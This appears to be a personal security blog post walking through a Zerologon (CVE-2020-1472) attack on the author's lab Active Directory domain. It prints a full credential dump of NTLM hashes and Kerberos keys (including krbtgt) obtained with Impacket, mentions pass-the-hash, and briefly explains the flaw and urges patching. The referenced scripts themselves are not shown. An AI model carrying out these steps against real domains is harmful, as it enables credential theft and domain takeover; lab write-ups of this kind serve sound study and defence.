Total Pageviews

Wednesday, October 13, 2021

Active Directory CORPORATIVE.domain.local Series[X] : Zerologon attack

 Hi everyone!!,


So far so good, in this post i'm going to explain how to perform the zerologon attack over Active directory on my local company environment COOPERATIVE.DOMAIN.local




This vulnerability was detected on the las year 2020, and allow to a remote and unauthenticated attacker obtain all hashes on Windows server Active Directory target machine:

CVE-2020-1472


The first step is detected if the target system is vulnerable to this exploit, for this task is possible use the follow script develop on python:


And in order to perform the attack it's possible exploit use the following exploit:




Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrador:500:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74b9c26e436d8ceacd2db129dbed8091:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORPORATIVE.DOMAIN.local\worker1:1106:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\worker2:1107:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\SVC_service:1109:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\NP_user:1110:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE.DOMAIN.local\test_user:1111:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::
CORPORATIVE-DOM$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WKS-002$:1103:aad3b435b51404eeaad3b435b51404ee:26ea21a020599bf2757bdef562adbcc7:::
WKS-001$:1104:aad3b435b51404eeaad3b435b51404ee:efe101633fb3881f250d512d388cb700:::
[*] Kerberos keys grabbed
CORPORATIVE.DOMAIN.local\krbtgt:aes256-cts-hmac-sha1-96:178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e
CORPORATIVE.DOMAIN.local\krbtgt:aes128-cts-hmac-sha1-96:84edbefb34b31b613865a44d4bf66e05
CORPORATIVE.DOMAIN.local\krbtgt:des-cbc-md5:46a25ef4f8cbec0d
CORPORATIVE.DOMAIN.local\worker1:aes256-cts-hmac-sha1-96:4686da5eda179be4c46be0524b5590509408301b15a03150cc901d58dc25ea02
CORPORATIVE.DOMAIN.local\worker1:aes128-cts-hmac-sha1-96:a5272782e4809030425764777b89b377
CORPORATIVE.DOMAIN.local\worker1:des-cbc-md5:0816198940dae589
CORPORATIVE.DOMAIN.local\worker2:aes256-cts-hmac-sha1-96:fb1ac4dd6cdc58614db210da4296f60f4f76931c7ed783ba7d4c2d23ab6ae153
CORPORATIVE.DOMAIN.local\worker2:aes128-cts-hmac-sha1-96:f55967570c4b562cc3fdd696d37603cc
CORPORATIVE.DOMAIN.local\worker2:des-cbc-md5:5bb5cb23076e5eef
CORPORATIVE.DOMAIN.local\SVC_service:aes256-cts-hmac-sha1-96:53cb07135999888c62a8cf58a449cc24e89ad12c3dd5f26d373657947fc2578f
CORPORATIVE.DOMAIN.local\SVC_service:aes128-cts-hmac-sha1-96:08398a5e5779afef70121bd2fe8c5153
CORPORATIVE.DOMAIN.local\SVC_service:des-cbc-md5:5b29adb0efa81691
CORPORATIVE.DOMAIN.local\NP_user:aes256-cts-hmac-sha1-96:f537750e75139946ed51cfb8337314d127a17d3137a5ef8efec6b0becabebaac
CORPORATIVE.DOMAIN.local\NP_user:aes128-cts-hmac-sha1-96:07301297fb5aad297fb0a6b7bd2eeeed
CORPORATIVE.DOMAIN.local\NP_user:des-cbc-md5:a4296d1c2ce010c7
CORPORATIVE.DOMAIN.local\test_user:aes256-cts-hmac-sha1-96:d24ab0db83b636a6065d12d7451cbe5d8512a381caccac9e94ddd3ca2d0844d9
CORPORATIVE.DOMAIN.local\test_user:aes128-cts-hmac-sha1-96:48bf29b09e9d4753f58c9a249cc3ec4b
CORPORATIVE.DOMAIN.local\test_user:des-cbc-md5:15801c91c8a7ea29
CORPORATIVE-DOM$:aes256-cts-hmac-sha1-96:7ffab151f9fc7485b70447cab3373921338bf88906703fd5d4deb9d4a87fde16
CORPORATIVE-DOM$:aes128-cts-hmac-sha1-96:2d714652efe8aec574dd8ffce8e7ef8e
CORPORATIVE-DOM$:des-cbc-md5:a4e6b6ae5837806d
WKS-002$:aes256-cts-hmac-sha1-96:bc3ef9250185b6844385fae85f47c69e0e21f9e69a7ff2a9a5fd0fa28fdd91c9
WKS-002$:aes128-cts-hmac-sha1-96:c7431351b05123fcd6039f1611db23a4
WKS-002$:des-cbc-md5:32b6861998ba5e1c
WKS-001$:aes256-cts-hmac-sha1-96:57ee7e4e906c0fa2e8eea3b1dfadb4e6a4e036ae0c8e8b47728da431068a7efb
WKS-001$:aes128-cts-hmac-sha1-96:d34b1290f3df609fe9aa4d808004ee98
WKS-001$:des-cbc-md5:020be94686e05e07
[*] Cleaning up... 

And access using pass the hash:








 This vulnerability as you can see on the following documentation, could be exploited becaus the function: ComputeNetlogonCredential don't take a random value of IV initialitation vector during encryption symetric AES operation,

https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/

And this is all, for this kind of attack i hope that all the companies apply the recommended vendor patches!!.

best reagrds, f0ns1

 
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...